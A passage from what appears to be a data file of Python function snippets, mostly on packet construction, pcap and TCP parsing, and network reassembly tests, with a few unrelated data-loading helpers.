(ip_addr.packed[2],\n ip_addr.packed[3]))\n\n if ip6_addr not in allocated:\n yield [str(ip_addr), str(ip6_addr)]", "def process(self, packet):\n pass", "def remove_buffered_packets(self):\n seq = self.next_seq\n while True:\n p = self.buffer.pop(seq, None)\n if p is None:\n break\n else:\n seq += len(p.data)\n yield p", "def gtp_packets(\n self, type='fdir', tunnel_pkt='gtpu', inner_L3='ipv4',\n match_opt='matched', chk='', teid=0xF):\n pkts = []\n pkts_gtpc_pay = {'IPV4/GTPC': 'Ether()/IP()/UDP(%sdport=2123)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPC': 'Ether()/IPv6()/UDP(%sdport=2123)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid)}\n\n pkts_gtpu_pay = {'IPV4/GTPU': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid)}\n\n pkts_gtpu_ipv4 = {'IPV4/GTPU/IPV4': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/FRAG': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP(frag=5)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/UDP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/TCP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/SCTP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/ICMP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/ICMP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/FRAG': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP(frag=5)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/UDP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/TCP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/SCTP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/ICMP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/ICMP()/Raw(\"X\"*20)' % (chk, teid)}\n\n pkts_gtpu_ipv6 = {'IPV4/GTPU/IPV6/FRAG': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/IPv6ExtHdrFragment()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/UDP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/TCP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/SCTP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/ICMP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6(nh=58)/ICMP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/FRAG': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/IPv6ExtHdrFragment()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/UDP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/TCP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/SCTP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/ICMP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6(nh=58)/ICMP()/Raw(\"X\"*20)' % (chk, teid)}\n\n if match_opt == 'matched':\n if tunnel_pkt is 'gtpc' and inner_L3 is None:\n pkts = pkts_gtpc_pay\n if tunnel_pkt is 'gtpu' and inner_L3 is None:\n pkts = pkts_gtpu_pay\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv4':\n pkts = pkts_gtpu_ipv4\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv6':\n pkts = pkts_gtpu_ipv6\n\n if match_opt == 'not matched':\n if type is 'fdir':\n if tunnel_pkt is 'gtpc' and inner_L3 is None:\n pkts = dict(\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv4.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu' and inner_L3 is None:\n pkts = dict(\n pkts_gtpc_pay.items() +\n pkts_gtpu_ipv4.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv4':\n pkts = dict(\n pkts_gtpc_pay.items() +\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv6':\n pkts = dict(\n pkts_gtpc_pay.items() +\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv4.items())\n if type is 'clfter':\n if tunnel_pkt is 'gtpc':\n pkts = dict(\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv4.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu':\n pkts = pkts_gtpc_pay\n return pkts", "def recv_raw(self) -> Dict[str, Any]:\n while True:\n try:\n packet = self.__recv_frame()\n except UnknownPacketException:\n continue\n\n # Hack for sniffing on localhost\n if packet['address']['interface'] == 'lo' and packet['address']['type'] != 4:\n continue\n\n if self.address and self.port:\n if (\n packet['ip_header']['source_address'] == self.address and\n packet['tcp_header']['source_port'] == self.port\n ):\n return packet\n if (\n packet['ip_header']['destination_address'] == self.address and\n packet['tcp_header']['destination_port'] == self.port\n ):\n return packet\n elif self.address:\n if (\n packet['ip_header']['source_address'] == self.address or\n packet['ip_header']['destination_address'] == self.address\n ):\n return packet\n elif self.port:\n if (\n packet['tcp_header']['source_port'] == self.port or\n packet['tcp_header']['destination_port'] == self.port\n ):\n return packet\n else:\n return packet", "def traffic_permutation(request):\n global AVP_MAC, NVP_MAC, UDP_SPORT, SRC_IP, OUTER_SRC_MAC,\\\n OUTER_DST_MAC, PKT_TYPE\n\n # Values common to all packet types\n AVP_MAC = MAC_A\n SRC_IP = H2_IP\n OUTER_SRC_MAC = HOST2_MAC\n OUTER_DST_MAC = SW_MAC\n\n # NVP_MAC updated based on pkt_type\n NVP_MAC_dict = {TrafficType.l2_basic: MAC_B,\n TrafficType.stp: STP_DEST_MAC,\n TrafficType.broadcast: BROADCAST_MAC,\n TrafficType.multicast: MULTICAST_MAC,\n TrafficType.lldp: LLDP_MAC}\n PKT_TYPE_dict = {TrafficType.l2_basic: 'l2_basic',\n TrafficType.stp: 'stp',\n TrafficType.broadcast: 'broadcast',\n TrafficType.multicast: 'multicast',\n TrafficType.lldp: 'lldp'}\n\n NVP_MAC = NVP_MAC_dict[request.param]\n PKT_TYPE = PKT_TYPE_dict[request.param]\n yield request.param", "def get_next_frame(self):\n if self.idx >= len(self.input_frames):\n try:\n key, self.input_frames = next(self.input_it)\n except StopIteration:\n return None, None\n\n self.idx = 0\n self.output_frames = self.output_dict[key]\n\n inputs = self.input_frames[self.idx]\n outputs = self.pfeats_map.phn_to_pfeats(self.output_frames[self.idx])\n self.idx += 1\n\n return inputs, outputs", "def flow_to_iter(flow):\n if ((sys.version_info.major == 3 and hasattr(flow, \"__next__\"))\n or (sys.version_info.major == 2 and hasattr(flow, \"next\"))):\n return flow\n else:\n return iter(flow)", "def test_traffic_paging_flow(self):\n # Need to delete all default flows in table 0 before\n # install the specific flows test case.\n self.classifier_controller._delete_all_flows()\n\n ue_ip_addr = \"192.168.128.30\"\n self.classifier_controller.install_paging_flow(\n 200,\n IPAddress(version=IPAddress.IPV4, address=ue_ip_addr.encode('utf-8')),\n True,\n )\n # Create a set of packets\n pkt_sender = ScapyPacketInjector(self.BRIDGE)\n eth = Ether(dst=self.MAC_1, src=self.MAC_2)\n ip = IP(src=self.Dst_nat, dst='192.168.128.30')\n o_udp = UDP(sport=2152, dport=2152)\n i_udp = UDP(sport=1111, dport=2222)\n i_tcp = TCP(seq=1, sport=1111, dport=2222)\n i_ip = IP(src='192.168.60.142', dst=self.EnodeB_IP)\n\n gtp_packet_udp = eth / ip / o_udp / GTP_U_Header(teid=0x1, length=28, gtp_type=255) / i_ip / i_udp\n gtp_packet_tcp = eth / ip / o_udp / GTP_U_Header(teid=0x1, length=68, gtp_type=255) / i_ip / i_tcp\n\n # Check if these flows were added (queries should return flows)\n flow_queries = [\n FlowQuery(\n self._tbl_num, self.testing_controller,\n match=MagmaMatch(tunnel_id=1, in_port=32768),\n ),\n FlowQuery(\n self._tbl_num, self.testing_controller,\n match=MagmaMatch(ipv4_dst='192.168.128.30'),\n ),\n ]\n # =========================== Verification ===========================\n # Verify 2 flows installed for classifier table (2 pkts matched)\n\n flow_verifier = FlowVerifier(\n [\n FlowTest(\n FlowQuery(\n self._tbl_num,\n self.testing_controller,\n ), 2, 2,\n ),\n ], lambda: wait_after_send(self.testing_controller),\n )\n\n snapshot_verifier = SnapshotVerifier(\n self, self.BRIDGE,\n self.service_manager,\n )\n\n with flow_verifier, snapshot_verifier:\n pkt_sender.send(gtp_packet_udp)\n pkt_sender.send(gtp_packet_tcp)\n\n flow_verifier.verify()", "def handle_tcp(pkt, packets, i, start_point):\r\n src_port = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n dest_port = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n sequence_num = int(pkt[start_point:start_point+8], 16)\r\n start_point += 8\r\n acknowledgment = int(pkt[start_point:start_point+8], 16)\r\n start_point += 8\r\n data_offset = int(pkt[start_point], 16) * 4\r\n start_point += 2\r\n flags = pkt[start_point:start_point+2]\r\n flags_str = \"\"\r\n for f in flags:\r\n flags_str += str(format(int(f), '04b'))\r\n start_point += 2\r\n window_size = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n checksum_value = pkt[start_point:start_point+4]\r\n start_point += 4\r\n urgent_pointer = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n options = int((2 * packets[i][0][0] - start_point)/2)\r\n\r\n packets[i][2].append(src_port)\r\n packets[i][2].append(dest_port)\r\n packets[i][2].append(sequence_num)\r\n packets[i][2].append(acknowledgment)\r\n packets[i][2].append(data_offset)\r\n packets[i][2].append(flags_str)\r\n packets[i][2].append(window_size)\r\n packets[i][2].append(checksum_value)\r\n packets[i][2].append(urgent_pointer)\r\n packets[i][2].append(options)\r\n return packets", "def packetReceived(self, packet):\n for layer in packet:\n if (layer.layer_name == 'fmtp' and\n int(layer.type) == 1):\n # Data is stored as a hexadecimal string in the XML file\n # generated by tshark\n data = binascii.unhexlify(layer.data)\n log.msg(\"FMTP message received: {}\".format(data))", "def _next_minibatch(self, tile_one=False, batch_size=None, **kwargs):\n if batch_size is None:\n batch_size = self.batch_size\n if tile_one:\n batch = [self.data[self.ix]] * batch_size\n self.ix += 1\n if self.ix >= len(self.data):\n random.shuffle(self.data)\n self.ix -= len(self.data)\n else:\n batch = self.data[self.ix: self.ix+batch_size]\n if len(batch) < batch_size:\n random.shuffle(self.data)\n self.ix = batch_size - len(batch)\n batch += self.data[:self.ix]\n else:\n self.ix += batch_size\n self.batch = deepcopy(batch)\n \n self.start_list = []\n self.dest_list = []\n self.fake_start_list = []\n self.fake_dest_list = []\n\n \n for i,item in enumerate(self.batch):\n self.start_list.append(item['path'][0])\n self.dest_list.append(item['path'][-1])\n path_length = len(item['path'])\n scan = item['scan']\n fake_flag = True\n fail_flag = False\n goal_list = [goal for goal in self.paths[scan][self.start_list[-1]]]\n random.shuffle(goal_list)\n\n for goal in goal_list:\n if abs(path_length - len(self.paths[scan][self.start_list[-1]][goal])) < 1 and self.distances[scan][self.dest_list[-1]][goal] > 3:\n self.fake_dest_list.append(self.paths[scan][self.start_list[-1]][goal])\n # print('fake_dest',i)\n fake_flag = False\n break\n\n if fake_flag:\n fail_flag = True\n # print('fake dest error')\n self.fake_dest_list.append(item['path'])\n\n fake_flag = True\n goal_list = [goal for goal in self.paths[scan][self.dest_list[-1]]]\n random.shuffle(goal_list)\n\n for goal in goal_list:\n if abs(path_length - len(self.paths[scan][self.dest_list[-1]][goal])) < 1 and self.distances[scan][self.start_list[-1]][goal] > 3:\n self.fake_start_list.append(self.paths[scan][self.dest_list[-1]][goal])\n fake_flag = False\n break\n \n \n if fake_flag:\n fail_flag = True\n # print('fake start error')\n self.fake_start_list.append(item['path'])\n\n # print('scan',scan)\n\n if i != 0 and fail_flag:\n self.batch[i] = deepcopy(self.batch[i-1])\n self.start_list[-1] = self.start_list[-2]\n self.dest_list[-1] = self.dest_list[-2]\n self.fake_start_list[-1] = self.fake_start_list[-2]\n self.fake_dest_list[-1] = self.fake_dest_list[-2]\n \n\n # cnt_dest = 0\n # cnt_star = 0\n # scan = self.batch[i]['scan']\n # item = self.batch[i]\n # # print('scan after',scan)\n # fake_dest_path = self.paths[scan][self.start_list[-1]][self.fake_dest_list[-1]]\n # fake_star_path = self.paths[scan][self.fake_start_list[-1]][self.dest_list[-1]]\n # for p in item['path']:\n # if p in fake_dest_path:\n # cnt_dest += 1\n # if p in fake_star_path:\n # cnt_star += 1\n # dis_dest = self.distances[scan][item['path'][-1]][self.fake_dest_list[-1]]\n # dis_star = self.distances[scan][item['path'][0]][self.fake_start_list[-1]]\n # print('length',path_length,'fake dest',cnt_dest, 'fake start',cnt_star,'dis:','dest',dis_dest,'start',dis_star)\n\n # print('ori',item['path'])\n # print('des',self.paths[scan][self.start_list[-1]][self.fake_dest_list[-1]])\n # print('sta',self.paths[scan][self.fake_start_list[-1]][self.dest_list[-1]])\n # print('')", "def process(self, pkt):\n pass", "def itersessions(self):\n for x in np.unique(self.sessions):\n yield x, self.loc[self.sessions == x, :]", "def _next_minibatch(self, tile_one=False, batch_size=None, **kwargs):\n if batch_size is None:\n batch_size = self.batch_size\n if tile_one:\n batch = [self.data[self.ix]] * batch_size\n self.ix += 1\n if self.ix >= len(self.data):\n random.shuffle(self.data)\n self.ix -= len(self.data)\n else:\n batch = self.data[self.ix: self.ix+batch_size]\n if len(batch) < batch_size:\n random.shuffle(self.data)\n self.ix = batch_size - len(batch)\n batch += self.data[:self.ix]\n else:\n self.ix += batch_size\n self.batch = deepcopy(batch)\n \n self.start_list = []\n self.dest_list = []\n self.fake_start_list = []\n self.fake_dest_list = []\n\n \n for i,item in enumerate(self.batch):\n self.start_list.append(item['path'][0])\n self.dest_list.append(item['path'][-1])\n path_length = len(item['path'])\n scan = item['scan']\n fake_flag = True\n fail_flag = False\n goal_list = [goal for goal in self.paths[scan][self.start_list[-1]]]\n random.shuffle(goal_list)\n\n for goal in goal_list:\n if abs(path_length - len(self.paths[scan][self.start_list[-1]][goal])) < 1 and self.distances[scan][self.dest_list[-1]][goal] > 3:\n self.fake_dest_list.append(goal)\n # print('fake_dest',i)\n fake_flag = False\n break\n\n if fake_flag:\n fail_flag = True\n # print('fake dest error')\n self.fake_dest_list.append(item['path'][-1])\n\n fake_flag = True\n goal_list = [goal for goal in self.paths[scan][self.dest_list[-1]]]\n random.shuffle(goal_list)\n\n for goal in goal_list:\n if abs(path_length - len(self.paths[scan][self.dest_list[-1]][goal])) < 1 and self.distances[scan][self.start_list[-1]][goal] > 3:\n self.fake_start_list.append(goal)\n fake_flag = False\n break\n \n \n if fake_flag:\n fail_flag = True\n # print('fake start error')\n self.fake_start_list.append(item['path'][0])\n\n # print('scan',scan)\n\n if i != 0 and fail_flag:\n self.batch[i] = deepcopy(self.batch[i-1])\n self.start_list[-1] = self.start_list[-2]\n self.dest_list[-1] = self.dest_list[-2]\n self.fake_start_list[-1] = self.fake_start_list[-2]\n self.fake_dest_list[-1] = self.fake_dest_list[-2]\n \n\n # cnt_dest = 0\n # cnt_star = 0\n # scan = self.batch[i]['scan']\n # item = self.batch[i]\n # # print('scan after',scan)\n # fake_dest_path = self.paths[scan][self.start_list[-1]][self.fake_dest_list[-1]]\n # fake_star_path = self.paths[scan][self.fake_start_list[-1]][self.dest_list[-1]]\n # for p in item['path']:\n # if p in fake_dest_path:\n # cnt_dest += 1\n # if p in fake_star_path:\n # cnt_star += 1\n # dis_dest = self.distances[scan][item['path'][-1]][self.fake_dest_list[-1]]\n # dis_star = self.distances[scan][item['path'][0]][self.fake_start_list[-1]]\n # print('length',path_length,'fake dest',cnt_dest, 'fake start',cnt_star,'dis:','dest',dis_dest,'start',dis_star)\n\n # print('ori',item['path'])\n # print('des',self.paths[scan][self.start_list[-1]][self.fake_dest_list[-1]])\n # print('sta',self.paths[scan][self.fake_start_list[-1]][self.dest_list[-1]])\n # print('')", "def _get_next_packet(self):\n raise NotImplementedError(\"Do not instantiate csvAbstractReader directly.\")", "def parse_packet(linktype, packet):\n link_layer = parse_Ethernet(packet) if linktype == pcapy.DLT_EN10MB else parse_Cooked(packet)\n if link_layer['payload_type'] in ['IPv4', 'IPv6']:\n network_layer = parse_IPv4(link_layer['payload']) if link_layer['payload_type'] == 'IPv4' else parse_IPv6(link_layer['payload'])\n if network_layer['payload_type'] in ['UDP', 'TCP']:\n transport_layer = parse_UDP(network_layer['payload']) if network_layer['payload_type'] == 'UDP' else parse_TCP(network_layer['payload'])\n return (link_layer, network_layer, transport_layer)", "def process_pcap(pcap):\n\n print \"Processing\", pcap\n pcap_path, _ = os.path.splitext(pcap)\n # strip_payload_from_pcap(pcap)\n os.system(\"tshark -nn -T fields -E separator=/t -e frame.time_epoch\"\n \" -e ip.src -e ip.dst -e tcp.srcport -e tcp.dstport\"\n \" -e ip.proto -e ip.len -e ip.hdr_len -e tcp.hdr_len -e data.len\"\n \" -e tcp.flags -e tcp.options.timestamp.tsval\"\n \" -e tcp.options.timestamp.tsecr -e tcp.seq -e tcp.ack\"\n \" -e tcp.window_size_value -e expert.message \"\n \" -r %s > %s.tshark\" % (pcap, pcap_path))\n # tcpdump command from Panchenko's raw-to-tcp script\n os.system(\"\"\"tcpdump -r {0} -n -l -tt -q -v | sed -e 's/^[ ]*//' |\n awk '/length ([0-9][0-9]*)/{{printf \"%s \",$0;next}}{{print}}' > {1}\"\"\".\\\n format(pcap, pcap_path + '.tcpdump'))", "def get_next_output_packet(self):\n if self.num_packets != 0:\n return self.packet_buffer.pop(0)", "def get_current_drops(output):\n has_skipped_netem = False\n for line in output.split(\"\\n\"):\n # it looks like the tbf share a buffer\n # So, the we only need to recor the first one seen\n # break after the second one\n match = re.search(q_pattern, line)\n if (match):\n if (not has_skipped_netem):\n has_skipped_netem = True\n continue\n sent = int(match.group(\"sent\"))\n dropped = int(match.group(\"dropped\"))\n return (sent, dropped)", "def next(self):\n while True:\n source_next = self.source_iter.next() \n if self.filter_func is None or self.filter_func(source_next):\n if self.casting_func is not None:\n return self.casting_func(source_next)\n else:\n return source_next", "def process_pkt_from_server(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, fin_flag):\n if acks[daddr, dport, saddr, sport][co.C2S] >= 0:\n conn_id = acks[daddr, dport, saddr, sport][co.CONN_ID]\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_ACK_TCP] = ts_delta\n if fin_flag:\n connections[conn_id].flow.attr[co.C2S][co.TIME_FIN_ACK_TCP] = ts_delta\n\n bytes_acked = (tcp.ack - acks[daddr, dport, saddr, sport][co.C2S]) % 4294967296\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n increment_value_dict(nb_acks[co.C2S][conn_id], bytes_acked)\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n if size_payload > 0 and tcp.seq in acks[daddr, dport, saddr, sport][SEQ_S2C]:\n # This is a retransmission!\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.S2C][co.TIMESTAMP_RETRANS].append((ts_delta,\n ts_delta - acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq][0],\n ts_delta - acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq][1],\n ts_delta - acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER]))\n acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq][1] = ts_delta\n elif size_payload > 0:\n acks[daddr, dport, saddr, sport][SEQ_S2C].add(tcp.seq)\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_PAYLD_TCP] = ts_delta\n acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq] = [ts_delta, ts_delta]\n # Don't think will face this issue\n# if len(acks[daddr, dport, saddr, sport][SEQ][co.S2C]) >= 3000000:\n# for x in range(50000):\n# acks[daddr, dport, saddr, sport][SEQ][co.S2C].popleft()\n\n acks[daddr, dport, saddr, sport][co.C2S] = tcp.ack\n acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER] = ts_delta", "def iterate(cls, disc, track_number):\n\n assert track_number >= 0 and track_number < len(disc.tracks)\n\n track = disc.tracks[track_number]\n\n packet_frame_size = (\n disc.audio_format.rate / cls.PACKETS_PER_SECOND)\n\n # Mock up a packet that ends at the start of index 1, so the\n # first packet generated starts at that position\n p = cls(disc, track, track_number, track.pregap_offset, 0)\n\n while True:\n # Calculate offsets of next packet\n abs_pos = p.abs_pos + p.length\n\n if abs_pos < track.pregap_offset:\n length = min(track.pregap_offset - abs_pos, packet_frame_size)\n else:\n length = min(track.length - abs_pos, packet_frame_size)\n\n assert length >= 0\n\n if length == 0:\n # Reached end of track, switch to next. Simplify this\n # code by generating a dummy packet for the next\n # iteration to work on (but don't yield it!)\n\n track_number += 1\n\n try:\n track = disc.tracks[track_number]\n except IndexError:\n # That was the last track, no more packets\n return\n\n p = cls(disc, track, track_number, 0, 0)\n\n else:\n # Generate next packet\n flags = 0\n if (track.pause_after\n and abs_pos + length == track.length\n and track_number + 1 < len(disc.tracks)):\n flags |= p.PAUSE_AFTER\n\n p = cls(disc, track, track_number, abs_pos, length, flags)\n yield p", "def final_repset_from_iteration_repsets(repset_fasta_fs):\r\n observed = {}\r\n for repset_fasta_f in repset_fasta_fs:\r\n for otu_id, seq in parse_fasta(repset_fasta_f):\r\n o = otu_id.split()[0]\r\n if not o in observed:\r\n yield (otu_id, seq)\r\n observed[o] = None\r\n else:\r\n # we already have a representative for this otu id\r\n pass", "def iterator_peek(iterator: Iterator[T], count: int) -> tuple[list[T], Iterator[T]]:\n\n ret = []\n for _ in range(count):\n try:\n ret.append(next(iterator))\n except StopIteration:\n break\n\n return ret, chain(ret, iterator)", "def process_mptcp_pkt_from_server(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport):\n dss, dack, dss_is_8_bytes = get_dss_and_data_ack(tcp)\n conn_id = acks[daddr, dport, saddr, sport][co.CONN_ID]\n flow_id = acks[daddr, dport, saddr, sport][co.FLOW_ID]\n if conn_acks[conn_id][co.C2S] >= 0:\n max_val = 2**64 if dss_is_8_bytes else 2**32\n bytes_acked = (dack - conn_acks[conn_id][co.C2S]) % max_val\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n if (size_payload > 0 and dss in conn_acks[conn_id][SEQ_S2C] and (dss - conn_acks[conn_id][co.S2C]) % max_val < 2000000000\n and (mptcp_connections[conn_id].attr[co.S2C][co.TIME_LAST_ACK_TCP] - ts_delta).total_seconds() > 0.0):\n # This is a DSS retransmission!\n mptcp_connections[conn_id].attr[co.S2C][co.RETRANS_DSS].append((ts_delta, flow_id, dss, conn_acks[conn_id][HSEQ_S2C][dss][2],\n ts_delta - conn_acks[conn_id][HSEQ_S2C][dss][0],\n ts_delta - conn_acks[conn_id][HSEQ_S2C][dss][1],\n ts_delta - conn_acks[conn_id][co.TIMESTAMP][SERVER]))\n conn_acks[conn_id][HSEQ_S2C][dss][1] = ts_delta\n elif size_payload > 0 and dss is not False:\n conn_acks[conn_id][SEQ_S2C].add(dss)\n conn_acks[conn_id][HSEQ_S2C][dss] = [ts_delta, ts_delta, ts_delta - conn_acks[conn_id][co.TIMESTAMP][SERVER]]\n\n conn_acks[conn_id][co.C2S] = dack\n acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER] = ts_delta\n conn_acks[conn_id][co.TIMESTAMP][SERVER] = ts_delta", "def print_info(self):\n \n i = 1\n for pcap_packet in self.pcap_packets:\n print '----------------frame: %d------------' % i\n i += 1\n pcap_packet.ethernet.print_info()\n \n #skip the packet that is not ip packet\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n \n print '################# packet in the frame ################'\n pcap_packet.ip.print_info()\n \n #skp the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n print '@@@@@@@@@@@@@@@@@@@ tcp fields @@@@@@@@@@@@@@@@@@@@'\n pcap_packet.tcp.print_info()\n \n print\n #endof for", "def print_info(self):\n \n i = 1\n for pcap_packet in self.pcap_packets:\n print '----------------frame: %d------------' % i\n i += 1\n pcap_packet.ethernet.print_info()\n \n #skip the packet that is not ip packet\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n \n print '################# packet in the frame ################'\n pcap_packet.ip.print_info()\n \n #skp the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n print '@@@@@@@@@@@@@@@@@@@ tcp fields @@@@@@@@@@@@@@@@@@@@'\n pcap_packet.tcp.print_info()\n \n print\n #endof for", "def test_lru(self):\n\n self.vapi.ip_reassembly_set(\n timeout_ms=1000000,\n max_reassemblies=1,\n max_reassembly_length=1000,\n type=VppEnum.vl_api_ip_reass_type_t.IP_REASS_TYPE_SHALLOW_VIRTUAL,\n expire_walk_interval_ms=10000,\n )\n\n payload_len = 1000\n payload = \"\"\n counter = 0\n while len(payload) < payload_len:\n payload += \"%u \" % counter\n counter += 1\n\n packet_count = 10\n\n fragments = [\n f\n for i in range(packet_count)\n for p in (\n Ether(dst=self.src_if.local_mac, src=self.src_if.remote_mac)\n / IP(id=i, src=self.src_if.remote_ip4, dst=self.dst_if.remote_ip4)\n / UDP(sport=1234, dport=5678)\n / Raw(payload)\n )\n for f in fragment_rfc791(p, payload_len / 4)\n ]\n\n self.pg_enable_capture()\n self.src_if.add_stream(fragments)\n self.pg_start()\n c = self.dst_if.get_capture(len(fragments))\n for sent, recvd in zip(fragments, c):\n self.assertEqual(sent[IP].src, recvd[IP].src)\n self.assertEqual(sent[IP].dst, recvd[IP].dst)\n self.assertEqual(sent[Raw].payload, recvd[Raw].payload)", "def test_lru(self):\n\n self.vapi.ip_reassembly_set(\n timeout_ms=1000000,\n max_reassemblies=1,\n max_reassembly_length=1000,\n type=VppEnum.vl_api_ip_reass_type_t.IP_REASS_TYPE_SHALLOW_VIRTUAL,\n is_ip6=1,\n expire_walk_interval_ms=10000,\n )\n\n payload_len = 1000\n payload = \"\"\n counter = 0\n while len(payload) < payload_len:\n payload += \"%u \" % counter\n counter += 1\n\n packet_count = 10\n\n fragments = [\n f\n for i in range(packet_count)\n for p in (\n Ether(dst=self.src_if.local_mac, src=self.src_if.remote_mac)\n / IPv6(src=self.src_if.remote_ip6, dst=self.dst_if.remote_ip6)\n / UDP(sport=1234, dport=5678)\n / Raw(payload)\n )\n for f in fragment_rfc8200(p, i, payload_len / 4)\n ]\n\n self.pg_enable_capture()\n self.src_if.add_stream(fragments)\n self.pg_start()\n c = self.dst_if.get_capture(len(fragments))\n for sent, recvd in zip(fragments, c):\n self.assertEqual(sent[IPv6].src, recvd[IPv6].src)\n self.assertEqual(sent[IPv6].dst, recvd[IPv6].dst)\n 